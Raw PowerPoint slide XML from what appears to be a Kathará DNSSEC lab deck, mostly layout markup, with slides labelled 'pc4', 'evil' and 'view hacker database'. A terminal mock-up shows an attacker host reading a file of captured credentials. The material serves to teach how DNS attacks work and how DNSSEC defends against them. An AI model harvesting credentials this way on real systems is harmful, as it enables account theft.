            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9434FA79-122A-AF0D-18B7-15652FB88390}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4BFCBC-9CE7-86D5-5CBD-9C4EB54D5055}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF63C4D5-D4B6-CFC2-14B2-E83DFEB84322}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51139FAC-6BEC-F0FE-7C7C-AB3766562758}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE02203E-77D3-FAE2-110E-F6C041AA1386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9071710" y="2332427"/>
            <a:ext cx="2782277" cy="415629"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -33391"/>
              <a:gd name="adj2" fmla="val 214138"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>trust-anchors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169767643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D00A12-E21A-78F1-A077-7AEA9D28855D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82431CB8-7E4C-2571-F17B-A34E4AAECC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC015EA-E5F5-1819-45D8-756B754DC154}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="1231999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7DC013-4D2C-A94A-549F-2D34B67A0515}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2378845"/>
              <a:ext cx="10216014" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE778110-45E5-B892-FC7C-17790C6A4C9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6453A03-F3EB-AE44-914A-EA9B92399B43}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C0846F3-4D03-2924-BEF3-71F4E447FFB5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9218E761-09F6-D814-3AC9-8BA66AC9079A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1814E57D-0633-EED0-5E19-B83CE6B89B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC430BC-62C0-6AF8-F48C-721536EBB44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87D169D8-41B4-2A79-E1E4-E4F67FA736CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1E2BC2-D870-AFFA-DC58-14E4D50EB9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822" cy="371513"/>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endParaRPr lang="en-US" sz="1800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317135873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B9B9C8-6216-425A-C877-902928F23E5C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C128DD5-44DD-68F6-4E63-B2E95B4D3872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB8CCEC0-96FD-7A2E-F080-85BBA8AE13F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="1231999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>--- CAPTURE ---</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E947B8ED-5F12-B64A-C2E9-A84BC2830F5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2378845"/>
              <a:ext cx="10216014" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
